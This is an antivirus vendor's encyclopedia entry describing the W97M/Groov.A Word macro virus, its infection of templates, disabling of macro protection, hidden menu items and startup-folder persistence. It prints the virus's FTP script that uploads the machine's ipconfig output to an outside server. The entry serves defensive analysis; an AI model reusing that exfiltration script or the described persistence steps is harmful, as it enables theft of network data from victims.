Threat Encyclopedia

Selected viruses, spyware, and other threats: sorted alphabetically

W97M/Groov.A

W97M/Groov.A is a macro virus operating in the Microsoft Word 97 SR-1 environment. It attacks active documents and the global template normal.dot. This macro virus is able of spreading independently of the global template by means of the file data.dot.
After opening an infected document the virus disables the Word anti-virus protection, suppresses displaying of warning windows at writing into the global template and at macros conversion. Then it finds out whether the virus was activated from the global template, from a common document or from the file data.dot and whether these potential sources of virus activation have already been attacked.
If the virus was activated from a common document it exports its code into the file c:\groovie.sys and tries to attack the global template. In the directory to which the Word internal variable Application.StartupPath points - typically the directory %windir%\application data\microsoft\word\startup – it stores the file, from which the virus was activated, under the name data.dot. Files from this directory are opened always when Word is run. It means that W97M/Groov.A is not independent of the global template at its spreading.
If the virus was activated from the global template and there is a document opened, it attacks the document and adds the text "ALT-F11 says it's groovie!" as a commentary to its summary. Then it creates the file data.dot in the way described above.
If the virus was activated from the file data.dot it tries to attack the global template and the active document and adds the text "ALT-F11 says it's groovie!" to its summary.
The virus deletes items Tools/Macro and Tools/Templates and supplements from the Word menu and by doing so it makes them inaccessible
The virus activates its performance, directed against the anti-virus program producer F-PROT with a 20% chance. The virus creates the file c:\script.sys. Its contents look as follows:

anonymous
replikator@B.com
cd incoming
send
c:\ip.txt
228.B
quit

Later the virus uses the file as a script for ftp for sending the file c:\ip.txt which it created by means of the program ipconfig.exe. This program is a standard part of the Windows operating system. The file c:\ip.txt contains data on the attacked computer IP protocol configuration (e.g. IP computer addresses, gates, server DNS) and on installed network cards. The virus sends this file to the server complex.is
W97M/Groov.A attacks documents when they are opened, closed, saved, when Word is finished or the document is printed.
At an attempt to view macro codes the following window is displayed:

© 1992-2004 Eset s.r.o. All rights reserved. No part of this Encyclopedia may be reproduced, transmitted or used in any other way in any form or by any means without the prior permission.